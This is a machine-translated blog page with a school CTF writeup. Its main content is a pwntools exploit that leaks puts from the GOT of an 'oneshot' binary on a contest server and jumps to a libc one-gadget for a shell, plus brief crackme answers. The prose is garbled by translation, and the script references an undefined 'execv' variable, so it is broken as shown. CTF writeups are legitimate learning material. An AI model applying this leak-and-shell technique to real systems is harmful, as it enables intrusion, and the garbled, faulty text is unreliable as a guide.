校赛writeup - Code World

校赛writeup

Others 2019-11-07 18:20:42 views: null

Warmup——pwn

The first input is an address

Content will address output - this can be used to leak

Once the location of a leak in the back of the input can jump to the desired

And does not require coverage here

Will jump directly to the location of the input to execution

But the subject lies in the pit to find the correct offset, in libc given, there are bands execv 8 / bin / sh of

One by one, try to find

Exp:

#!/usr/bin/env python

# encoding: utf-8

from pwn import *

proc_name = './oneshot'

proc_elf = ELF(proc_name)

print proc_elf.checksec()

context.log_level = 'debug'

io = remote("59.110.6.128",10086)

#io = process(proc_name)

#print proc.pidof(io)[0]

raw_input('debug')

local_lib_system =0x7ffff7a53380

local_lib_printf = 0x557b0

local_lib_execv = 0x451ff

local_lib_puts = 0x6f5d0

local_lib_temp = 0x6f4e6

lib2_sys = 0x46590

lib2_printf =0x0000000000054340

lib2_execv = 0x00000000000C12E0

lib2_puts = 0x6fd60

got_printf = 0x600ae8

got_puts = 0x600ad8

plt_puts = 0x4004F0

plt_printf = 0x400510

payload1 = str(int(got_puts))

io.recvuntil("?");

io.sendline(payload1)

io.recvuntil(":")

recvdata = io.recv()

puts_addr = recvdata[:19]

print "puts_addr "+ puts_addr

puts_addr = int(puts_addr,16)

execv1 = 0x6FBDA

execv2 = 0x46483

execv3 = 0xC18D1

execv4 = 0xC1BA3

execv5 = 0xC1BF2

execv6 = 0xE4968

execv7 = 0xE5765

execv8 = 0xE66BD

execv_addr = puts_addr + execv - lib2_puts

print "execv_addr  " +str(hex(execv_addr))

payload2 = str(execv_addr)

io.sendline(payload2)

io.recvuntil("!")

io.interactive()

warmup——re

it's actually really easy

With ida open to see what you can

Then write a program, according to the hint - goodgoodstudydaydayup

But if there is no hint it is difficult. . . Complete guess. . .

Crackme

Analysis of four flag can be obtained

level one:

Simple backwards to know 2

Second floor:

In fact, this violence can seek out is 654321

the third floor

Given merrychrismas, calculated before adding X [] array, the string may be reversed to be inputted Release

Lcont=gpfoog`q

Fourth layer:

Calculated value of the flag variable needs of the preceding four functions

Not difficult, compiled a little drive came out

176455667

Note To run in cmd to see the flag-- because it will flash back

Guess you like

Origin www.cnblogs.com/volva/p/11813866.html

校赛writeup

saleae [WriteUp]

Chive WriteUp

bugkuctf Writeup

MOCTF-MISC-writeup

MOCTF-WEB-writeup

bugku useful CE WriteUp

南邮CTF - Writeup

Golden Year 6 [WriteUp]

HTB openadmin writeup

level2--writeup

hello_pwn--writeup

ctf比赛misc writeup

虎符-ctf crypto writeup

BMZCTF-Web WriteUp

BugKuCTF --- sql injection Writeup

DVWA Brute Force 解析（WriteUP）

Natas0-34 Writeup

VulnHub DC-2 Writeup

BMZCTF-MISC（一） WriteUp

CTFSHOW-WEB入门 writeup

TQLCTF2022 Misc WriteUp

2018 National Championship - Writeup (to be added)

bugku misc writeup (a normal archive)

Writeup.1.Lampiao drone penetration testing

XCTF offense and defense in the world of Web WriteUp

SCTF2019 Crypto-warmup writeup

Offensive and defensive novice Misc writeup world

Xiao Ming learning code audit writeup

HITCON2017(babyfirst-revenge) writeup

Recommended

Arc Browser for Windows 1.0 officially GA

A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!

Ranking

1. Select Sort

Create a thread thread

3 press to play ball that reach 6

Programmation CUDA (4) : gestion de la mémoire

SpringBoot database connection pool Druid error

E Diudiu App redesign summary

4EVERLAND Hosting now supports SNS+IPFS

About HTTPS

[vue3+vite+ts+element-plu+sass] uses bug records in sass

Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling

Daily

More

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)